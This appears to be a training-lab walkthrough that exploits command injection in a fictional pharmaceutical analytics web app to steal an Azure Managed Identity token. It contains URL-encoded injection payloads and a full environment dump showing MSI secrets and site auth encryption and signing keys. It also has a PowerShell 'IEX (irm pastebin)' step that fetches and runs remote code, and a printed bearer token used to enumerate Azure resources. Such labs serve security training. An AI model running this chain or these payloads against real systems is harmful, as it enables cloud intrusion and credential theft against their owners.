Learning Objective 10
Last updated
Was this helpful?
Last updated
Was this helpful?
Task
In the Attack Lab:
Find and exploit the RCE vulnerability in the analytics application https://analytics.pharmacorphq.com/
Request access token by leveraging Managed Identity.
Applies to: Attack Lab
Topics Covered: RCE Vulnerability Exploitation, Request Access Token, and Information Extraction from Managed Identity
firefox https://analytics.pharmacorphq.com/Create a new category and abuse command injection using URL encoding.
Execute the set command again to extract the environment variables.
cmd.exe /c set
%63%6d%64%2e%65%78%65%20%2f%63%20%73%65%74%20ACTION=start
AZURE_ENV_INITIALIZED=C:\Program Files\apache-tomcat-9.0.83\bin\
AZURE_LOGGING_DIR=C:\home/LogFiles
AZURE_SITE_APP_BASE=C:\home/site/wwwroot/webapps
AZURE_SITE_HOME=C:\home
AZURE_SITE_LIBS_DIR=C:\home/site/libs
AZURE_UNPACK_WARS=true
CATALINA_BASE=C:\Program Files\apache-tomcat-9.0.83
CATALINA_HOME=C:\Program Files\apache-tomcat-9.0.83
CATALINA_LOGGING_CONFIG=-Djava.util.logging.config.file="C:\Program Files\apache-tomcat-9.0.83\conf\logging.properties"CATALINA_OPTS= -DuseEncodedApplogs=true
CATALINA_TMPDIR=C:\local\Temp
CLASSPATH=C:\Program Files\apache-tomcat-9.0.83\lib\servlet-api.jar;C:\Program Files\apache-tomcat-9.0.83\lib\azure.appservice.jar;C:\Program Files\apache-tomcat-9.0.83\bin\bootstrap.jar;C:\Program Files\apache-tomcat-9.0.83\bin\tomcat-juli.jar
CURRENT_DIR=C:\home\site\wwwroot
ENDORSED_PROP=ignore.endorsed.dirs
JAVA_OPTS=-Dcatalina.valves.showReport=False -Dcatalina.valves.showServerInfo=False -Dcatalina.maxConnections=10000 -Dcatalina.maxThreads=200 -DappService.valves.appServiceErrorPage=true -Dsite.logdir=C:/home/LogFiles -Dsite.home=C:/home -Dsite.libs=C:/home/site/libs -Dsite.appbase=C:/home/site/wwwroot/webapps -Dsite.xmlbase=C:/home/site/wwwroot -Dsite.unpackwars=true -Dsite.tempdir=C:\local\Temp -Dcatalina.instance.name=28804d01bd138b9aa5cd8d0fb1a16ad687422d847e70e4e63b2c602d0f4bd58f -Dport.http=2043 -Djava.net.preferIPv4Stack=true -noverify -Dsite.logRetentionDays=0 -Dsite.logRotatable=true -Dsite.connectionTimeout=220000 -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources
JAVA_TMP_DIR=C:\local\Temp
JDK_JAVA_OPTIONS= --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMEDJRE_HOME=C:\Program Files\Java\Adoptium-Eclipse-Temurin-OpenJDK-8u392JSSE_OPTS=-Djdk.tls.ephemeralDHKeySize=2048
LOGGING_MANAGER=-Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
MAINCLASS=org.apache.catalina.startup.Bootstrap
PROMPT=$P$G
SystemDrive=C:ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 79 Stepping 1, GenuineIntelDOTNET_HOSTING_OPTIMIZATION_CACHE=C:\DotNetCachePROCESSOR_ARCHITECTURE=AMD64DriverData=C:\Windows\System32\Drivers\DriverDataPath=C:\Python27;C:\Program Files (x86)\nodejs;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\Microsoft Network Monitor 3\;C:\Program Files (x86)\dotnet;C:\Program Files\dotnet;C:\Users\packer\AppData\Roaming\npm;C:\Program Files (x86)\nodejs\;C:\Program Files (x86)\Mercurial\;C:\Program Files\Git\cmd;c:\Program Files (x86)\Microsoft ASP.NET\ASP.NET Web Pages\v1.0\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Program Files\Java\Adoptium-Eclipse-Temurin-OpenJDK-8u392\bin;AZURE_TOMCAT7_CMDLINE=-Dport.http=%HTTP_PLATFORM_PORT% -Djava.util.logging.config.file="C:\Program Files (x86)\apache-tomcat-7.0.94\conf\logging.properties" -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dsite.logdir="d:/home/LogFiles/" -Dsite.tempdir="d:\home\site\workdir" -classpath "C:\Program Files (x86)\apache-tomcat-7.0.94\bin\bootstrap.jar;C:\Program Files (x86)\apache-tomcat-7.0.94\bin\tomcat-juli.jar" -Dcatalina.base="C:\Program Files (x86)\apache-tomcat-7.0.94" -Djava.io.tmpdir="d:\home\site\workdir" org.apache.catalina.startup.BootstrapAZURE_JETTY9_HOME=C:\Program Files (x86)\jetty-distribution-9.1.0.v20131115AZURE_TOMCAT85_CMDLINE="-noverify -Djava.net.preferIPv4Stack=true -Dcatalina.instance.name=%WEBSITE_INSTANCE_ID% -Dport.http=%HTTP_PLATFORM_PORT% -Djava.util.logging.config.file=\"C:\Program Files\apache-tomcat-8.5.57\conf\logging.properties\" -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dsite.logdir=\"%HOME%\LogFiles\\" -Dsite.tempdir=\"%HOME%\site\workdir\" -classpath \"C:\Program Files\apache-tomcat-8.5.57\bin\bootstrap.jar;C:\Program Files\apache-tomcat-8.5.57\bin\tomcat-juli.jar\" -Dcatalina.base=\"C:\Program Files\apache-tomcat-8.5.57\" -Djava.io.tmpdir=\"%HOME%\site\workdir\" org.apache.catalina.startup.Bootstrap"AZURE_TOMCAT90_HOME=C:\Program Files\apache-tomcat-9.0.37
PROCESSOR_REVISION=4f01TEMP=C:\local\Temp
USERPROFILE=C:\local\UserProfile
USERNAME=dw1sdwk000BTX
SystemRoot=C:\WindowsAZURE_TOMCAT85_HOME=C:\Program Files\apache-tomcat-8.5.57
AZURE_TOMCAT7_HOME=C:\Program Files (x86)\apache-tomcat-7.0.94
AZURE_JETTY9_CMDLINE=-Djava.net.preferIPv4Stack=true -Djetty.port=%HTTP_PLATFORM_PORT% -Djetty.base="D:\Program Files (x86)\jetty-distribution-9.1.0.v20131115" -Djetty.webapps="d:\home\site\wwwroot\webapps" -jar "D:\Program Files (x86)\jetty-distribution-9.1.0.v20131115\start.jar" etc\jetty-logging.xmlCommonProgramFiles=C:\Program Files\Common FilesProgramData=C:\local\ProgramDataAZURE_JETTY93_HOME=C:\Program Files (x86)\jetty-distribution-9.3.25.v20180904
COMPUTERNAME=dw1sdwk000BTXRoleName=dw1SmallDedicatedWebWorkerRole
AZURE_TOMCAT10_HOME=C:\Program Files\apache-tomcat-10.1.16CommonProgramW6432=C:\Program Files\Common FilesRoleInstanceId=dw1SmallDedicatedWebWorkerRole_15333
AZURE_TOMCAT90_CMDLINE="-noverify -Djava.net.preferIPv4Stack=true -Dcatalina.instance.name=%WEBSITE_INSTANCE_ID% -Dport.http=%HTTP_PLATFORM_PORT% -Djava.util.logging.config.file=\"C:\Program Files\apache-tomcat-9.0.37\conf\logging.properties\" -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dsite.logdir=\"%HOME%\LogFiles\\" -Dsite.tempdir=\"%HOME%\site\workdir\" -classpath \"C:\Program Files\apache-tomcat-9.0.37\bin\bootstrap.jar;C:\Program Files\apache-tomcat-9.0.37\bin\tomcat-juli.jar\" -Dcatalina.base=\"C:\Program Files\apache-tomcat-9.0.37\" -Djava.io.tmpdir=\"%HOME%\site\workdir\" org.apache.catalina.startup.Bootstrap"TMP=C:\local\TempRoleRoot=E:
AZURE_JETTY93_CMDLINE=-Djava.net.preferIPv4Stack=true -Djetty.port=%HTTP_PLATFORM_PORT% -Djetty.base="D:\Program Files (x86)\jetty-distribution-9.3.25.v20180904" -Djetty.webapps="d:\home\site\wwwroot\webapps" -jar "D:\Program Files (x86)\jetty-distribution-9.3.25.v20180904\start.jar" etc\jetty-logging.xmlCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesAZURE_TOMCAT10_CMDLINE=-noverify -Djava.net.preferIPv4Stack=true -Dcatalina.instance.name=%WEBSITE_INSTANCE_ID% -Dport.http=%HTTP_PLATFORM_PORT% -Djava.util.logging.config.file="C:\Program Files\apache-tomcat-10.1.16\conf\logging.properties" -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dsite.logdir="d:/home/LogFiles/" -Dsite.tempdir="d:\home\site\workdir" -classpath "C:\Program Files\apache-tomcat-10.1.16\bin\bootstrap.jar;C:\Program Files\apache-tomcat-10.1.16\bin\tomcat-juli.jar" -Dcatalina.base="C:\Program Files\apache-tomcat-10.1.16" -Djava.io.tmpdir="d:\home\site\workdir" org.apache.catalina.startup.BootstrapWEBSITE_CATALINA_MAXCONNECTIONS=10000
WEBSITE_CATALINA_MAXTHREADS=200
WEBSITE_HTTPLOGGING_RETENTION_DAYS=0
WEBSITE_TOMCAT_CONNECTION_TIMEOUT=220000
WEBSITE_TOMCAT_LOGS_ROTATABLE=truewindir=C:\Windows
NUMBER_OF_PROCESSORS=1O
S=Windows_NTProgramFiles=C:\Program FilesComSpec=C:\Windows\system32\cmd.exe
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL;.PY;.PYW
AZURE_TOMCAT8_CMDLINE=-Dport.http=%HTTP_PLATFORM_PORT% -Djava.util.logging.config.file="C:\Program Files (x86)\apache-tomcat-8.0.53\conf\logging.properties" -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dsite.logdir="d:/home/LogFiles/" -Dsite.tempdir="d:\home\site\workdir" -classpath "C:\Program Files (x86)\apache-tomcat-8.0.53\bin\bootstrap.jar;C:\Program Files (x86)\apache-tomcat-8.0.53\bin\tomcat-juli.jar" -Dcatalina.base="C:\Program Files (x86)\apache-tomcat-8.0.53" -Djava.io.tmpdir="d:\home\site\workdir" org.apache.catalina.startup.BootstrapALLUSERS
PROFILE=C:\local\ProgramDataPSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files\WindowsPowerShell\Modules\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ResourceManager\AzureResourceManager\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ServiceManagement\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\Storage\
APPDATA=C:\local\AppData
USERDOMAIN=WORKGROUPPROCESSOR_LEVEL=6LOCALAPPDATA=C:\local\LocalAppDataResourceDrive=D:\MonAgentClientLocation=C:\Packages\Plugins\Microsoft.Azure.Geneva.GenevaMonitoring\2.44.0.5\Monitoring\Agent
AZURE_TOMCAT8_HOME=C:\Program Files (x86)\apache-tomcat-8.0.53
PUBLIC=C:\Users\PublicScmType=None
APPSETTING_ScmType=None
WEBSITE_SITE_NAME=analyticspharmacorp
APPSETTING_WEBSITE_SITE_NAME=analyticspharmacorp
WEBSITE_AUTH_ENABLED=False
APPSETTING_WEBSITE_AUTH_ENABLED=False
REMOTEDEBUGGINGVERSION=16.0.30709.132
APPSETTING_REMOTEDEBUGGINGVERSION=16.0.30709.132
FUNCTIONS_RUNTIME_SCALE_MONITORING_ENABLED=0
APPSETTING_FUNCTIONS_RUNTIME_SCALE_MONITORING_ENABLED=0
WEBSITE_AUTH_LOGOUT_PATH=/.auth/logout
APPSETTING_WEBSITE_AUTH_LOGOUT_PATH=/.auth/logout
WEBSITE_AUTH_AUTO_AAD=False
APPSETTING_WEBSITE_AUTH_AUTO_AAD=False
REGION_NAME=France Central
HOME=C:\homeHOME_EXPANDED=D:\DWASFiles\Sites\analyticspharmacorp\VirtualDirectory0LOCAL_EXPANDED=D:\DWASFiles\Sites\analyticspharmacorpwindows_tracing_flags=windows_tracing_logfile=
WEBSITE_INSTANCE_ID=28804d01bd138b9aa5cd8d0fb1a16ad687422d847e70e4e63b2c602d0f4bd58fWEBSITE_HTTPLOGGING_ENABLED=0
WEBSITE_SCM_ALWAYS_ON_ENABLED=1
WEBSITE_ISOLATION=pico
WEBSITE_OS=windows
WEBSITE_DEPLOYMENT_ID=analyticspharmacorp
WEBSITE_INFRASTRUCTURE_IP=10.11.1.167
WEBSITE_COMPUTE_MODE=DedicatedWEBSITE_SKU=Basic
WEBSITE_ELASTIC_SCALING_ENABLED=0
WEBSITE_SCM_SEPARATE_STATUS=1
WEBSITE_IIS_SITE_NAME=analyticspharmacorp
WEBSITE_APPSERVICEAPPLOGS_TRACE_ENABLED=true
WEBSITE_CHANGEANALYSISSCAN_ENABLED=1
MicrosoftInstrumentationEngine_LatestPath=C:\Program Files (x86)\SiteExtensions\InstrumentationEngine\1.0.43JAVA_HOME=C:\Program Files\Java\Adoptium-Eclipse-Temurin-OpenJDK-8u392
SITE_BITNESS=x86
WEBSITE_AUTH_ENCRYPTION_KEY=FC8E438475F00427819DB182616D53741FAFEA859E7310EB693BAF1F5A4DCB0F
WEBSITE_AUTH_SIGNING_KEY=7B45FA4108334C68A07D3D6A1627A95E8A171A535ABDEB6162C8EDB0A1F848CE
WEBSITE_PROACTIVE_AUTOHEAL_ENABLED=True
WEBSITE_PROACTIVE_STACKTRACING_ENABLED=True
WEBSITE_PROACTIVE_CRASHMONITORING_ENABLED=True
WEBSITE_CRASHMONITORING_USE_DEBUGDIAG=True
WEBSITE_DYNAMIC_CACHE=1
WEBSITE_FRAMEWORK_JIT=1
WEBSITE_HOME_STAMPNAME=waws-prod-par-021
WEBSITE_CURRENT_STAMPNAME=waws-prod-par-021
WEBSOCKET_CONCURRENT_REQUEST_LIMIT=350
WEBSITE_VOLUME_TYPE=PrimaryStorageVolume
WEBSITE_OWNER_NAME=aac02f74-b0d2-45d2-8fbc-8d33f274116f+Analytics-FranceCentralwebspace
WEBSITE_RESOURCE_GROUP=analyticsWEBSITE_CONTAINER_READY=1
WEBSITE_PHYSICAL_MEMORY_MB=1996WEBSITE_JAVA_MAX_HEAP_MB=1397
WEBSITE_STACK=TOMCATWEBSITE_PLATFORM_VERSION=102.1.7.93
REMOTEDEBUGGINGPORT=REMOTEDEBUGGINGBITVERSION=vx86
WEBSITE_LOCALCACHE_ENABLED=False
WEBSITE_HOSTNAME=analyticspharmacorp.azurewebsites.net
WEBSITE_RELAYS=WEBSITE_REWRITE_TABLE=MSI_ENDPOINT=http://127.0.0.1:41255/msi/token/MSI_SECRET=B0EC45CEE3344FFF8BFC97E7FA2B2FED
IDENTITY_ENDPOINT=http://127.0.0.1:41255/msi/token/
IDENTITY_HEADER=B0EC45CEE3344FFF8BFC97E7FA2B2FED
WEBSITE_DAAS_EXTENSIONPATH=C:\Program Files (x86)\SiteExtensions\DaaS\4.3.24223.4
HTTP_PLATFORM_PORT=2043_EXECJAVA="C:\Program Files\Java\Adoptium-Eclipse-Temurin-OpenJDK-8u392\bin\java.exe"_RUNJAVA=C:\Program Files\Java\Adoptium-Eclipse-Temurin-OpenJDK-8u392\bin\java.exe_RUNJDB=C:\Program Files\Java\Adoptium-Eclipse-Temurin-OpenJDK-8u392\bin\jdb.exeAfter investigating we see an IDENTITY Endpoint
IDENTITY_ENDPOINT=http://127.0.0.1:41255/msi/token/Azure provides the ability to assign Managed Identities to resources like App Services, Function Apps, Virtual Machines, and more.
Managed Identities are a feature of Azure Active Directory that eliminate the need for developers to manage credentials in their code, offering a more secure and streamlined authentication process.
These identities can be used to authenticate and access Azure services and resources without the need for embedded secrets or keys.
With Managed Identities, they can be assigned automatically, either as system-assigned or user-assigned, to a wide range of Azure resources, ensuring secure and seamless access control across your cloud infrastructure.
curl
"http://127.0.0.1:41255/MSI/token/?resource=https://management.azure.com&api/version=2017-09-01" -H secret:"B0EC45CEE3344FFF8BFC97E7FA2B2FED"Forge a request abusing OS Injection:
https://analytics.pharmacorphq.com/main?inputUser=%63%75%72%6c%20%22%68%74%74%70%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%34%31%32%35%35%2f%4d%53%49%2f%74%6f%6b%65%6e%2f%3f%72%65%73%6f%75%72%63%65%3d%68%74%74%70%73%3a%2f%2f%6d%61%6e%61%67%65%6d%65%6e%74%2e%61%7a%75%72%65%2e%63%6f%6d%26%61%70%69%2f%76%65%72%73%69%6f%6e%3d%32%30%31%37%2d%30%39%2d%30%31%22%20%2d%48%20%73%65%63%72%65%74%3a%22%42%30%45%43%34%35%43%45%45%33%33%34%34%46%46%46%38%42%46%43%39%37%45%37%46%41%32%42%32%46%45%44%22&category-color=dangerGo to paste bin and create a new paste:
$headers = @{
'secret' = 'B0EC45CEE3344FFF8BFC97E7FA2B2FED'
}
Invoke-RestMethod -Method GET -Uri "http://127.0.0.1:41255/msi/token/?resource=https://management.azure.com&api-version=2017-09-01" -Headers $headerspowershell -c IEX (irm 'https://pastebin.com/raw/ueYYY9D9')URL Encoding:
https://analytics.pharmacorphq.com/main?inputUser=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%63%20%49%45%58%20%28%69%72%6d%20%27%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%33%73%58%6e%6d%36%30%59%27%29&category-color=dangeraccess_token : eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyIsImtpZCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvZTBmOTk5YzEtODZlZS00N2EwLWJmZDUtMTg0NzAxNTRiN2NkLyIsImlhdCI6MTcyMTY4ODkzMSwibmJmIjoxNzIxNjg4OTMxLCJleHAiOjE3MjE3NzU2MzEsImFpbyI6IkUyZGdZSkRRU0o5dnRrTjgyV3gzKytNV0N5Yk9BUUE9IiwiYXBwaWQiOiIzMzI5ZmVhNy02NDJlLTRjMDktYjFhZC1kOGVkYmUxNDAyNjciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC9lMGY5OTljMS04NmVlLTQ3YTAtYmZkNS0xODQ3MDE1NGI3Y2QvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI3ZGY5YWU1Ny0zZWI5LTQzN2MtYTBlMi03MTQyODM3ODRjZGQiLCJyaCI6IjAuQVhFQXdabjU0TzZHb0VlXzFSaEhBVlMzelVaSWYza0F1dGRQdWtQYXdmajJNQk9IQUFBLiIsInN1YiI6IjdkZjlhZTU3LTNlYjktNDM3Yy1hMGUyLTcxNDI4Mzc4NGNkZCIsInRpZCI6ImUwZjk5OWMxLTg2ZWUtNDdhMC1iZmQ1LTE4NDcwMTU0YjdjZCIsInV0aSI6IkRBNE0yTmVFd0VhUFBPZG1LdXhMQUEiLCJ2ZXIiOiIxLjAiLCJ4bXNfaWRyZWwiOiI3IDE2IiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvYWFjMDJmNzQtYjBkMi00NWQyLThmYmMtOGQzM2YyNzQxMTZmL3Jlc291cmNlZ3JvdXBzL0FuYWx5dGljcy9wcm92aWRlcnMvTWljcm9zb2Z0LldlYi9zaXRlcy9hbmFseXRpY3NwaGFybWFjb3JwIiwieG1zX3RjZHQiOiIxNjU1MzUzNjI4In0.ntyzGD7Dzt2_SGKtckWLks7j0bxBDI6_c0up7YCDtYGbi-_GMKBt-RzfvUjnF1s4cs319qjGpLNbZzVIJyfIGp4VXOoHB9j1-5uIJXonHuvwRlpcbgDARbOXIOTcjch-Hq8FXYnaR54SVr_5QI89n-YPzB8JOtweZzCkZBCM9ZPbFWIrrA6b8H3uWonII-Vm7ta9RfKv5Rqeswd4laR44ffyXHp-8FiQNhjNn38RGPL69wb4CLqGScTSoDona6Di5l2_An9BCw95_GyS8_zOkMGws0vCUPdH-Q6Ns8AmbamkhO3uhQWiJaArHSZd6fAj_Zab_1Qh-nmtUS-aotalQQexpires_on: 7/23/2024 11:00:30 PM +00:00resource : https://management.azure.comtoken_type : Bearerclient_id : 3329FEA7-642E-4C09-B1AD-D8EDBE140267After obtaining the access token, remove any whitespaces. The cleaned token can then be used with the Az PowerShell module to authenticate and list resources accessible to the Managed Identity.
Token:
$Access_Token ="eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyIsImtpZCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvZTBmOTk5YzEtODZlZS00N2EwLWJmZDUtMTg0NzAxNTRiN2NkLyIsImlhdCI6MTcyMTY4ODkzMSwibmJmIjoxNzIxNjg4OTMxLCJleHAiOjE3MjE3NzU2MzEsImFpbyI6IkUyZGdZSkRRU0o5dnRrTjgyV3gzKytNV0N5Yk9BUUE9IiwiYXBwaWQiOiIzMzI5ZmVhNy02NDJlLTRjMDktYjFhZC1kOGVkYmUxNDAyNjciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC9lMGY5OTljMS04NmVlLTQ3YTAtYmZkNS0xODQ3MDE1NGI3Y2QvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI3ZGY5YWU1Ny0zZWI5LTQzN2MtYTBlMi03MTQyODM3ODRjZGQiLCJyaCI6IjAuQVhFQXdabjU0TzZHb0VlXzFSaEhBVlMzelVaSWYza0F1dGRQdWtQYXdmajJNQk9IQUFBLiIsInN1YiI6IjdkZjlhZTU3LTNlYjktNDM3Yy1hMGUyLTcxNDI4Mzc4NGNkZCIsInRpZCI6ImUwZjk5OWMxLTg2ZWUtNDdhMC1iZmQ1LTE4NDcwMTU0YjdjZCIsInV0aSI6IkRBNE0yTmVFd0VhUFBPZG1LdXhMQUEiLCJ2ZXIiOiIxLjAiLCJ4bXNfaWRyZWwiOiI3IDE2IiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvYWFjMDJmNzQtYjBkMi00NWQyLThmYmMtOGQzM2YyNzQxMTZmL3Jlc291cmNlZ3JvdXBzL0FuYWx5dGljcy9wcm92aWRlcnMvTWljcm9zb2Z0LldlYi9zaXRlcy9hbmFseXRpY3NwaGFybWFjb3JwIiwieG1zX3RjZHQiOiIxNjU1MzUzNjI4In0.ntyzGD7Dzt2_SGKtckWLks7j0bxBDI6_c0up7YCDtYGbi-_GMKBt-RzfvUjnF1s4cs319qjGpLNbZzVIJyfIGp4VXOoHB9j1-5uIJXonHuvwRlpcbgDARbOXIOTcjch-Hq8FXYnaR54SVr_5QI89n-YPzB8JOtweZzCkZBCM9ZPbFWIrrA6b8H3uWonII-Vm7ta9RfKv5Rqeswd4laR44ffyXHp-8FiQNhjNn38RGPL69wb4CLqGScTSoDona6Di5l2_An9BCw95_GyS8_zOkMGws0vCUPdH-Q6Ns8AmbamkhO3uhQWiJaArHSZd6fAj_Zab_1Qh-nmtUS-aotalQQ" Connect-AzAccount -AccessToken $Access_Token -AccountId "3329FEA7-642E-4C09-B1AD-D8EDBE140267"Get-AzResource
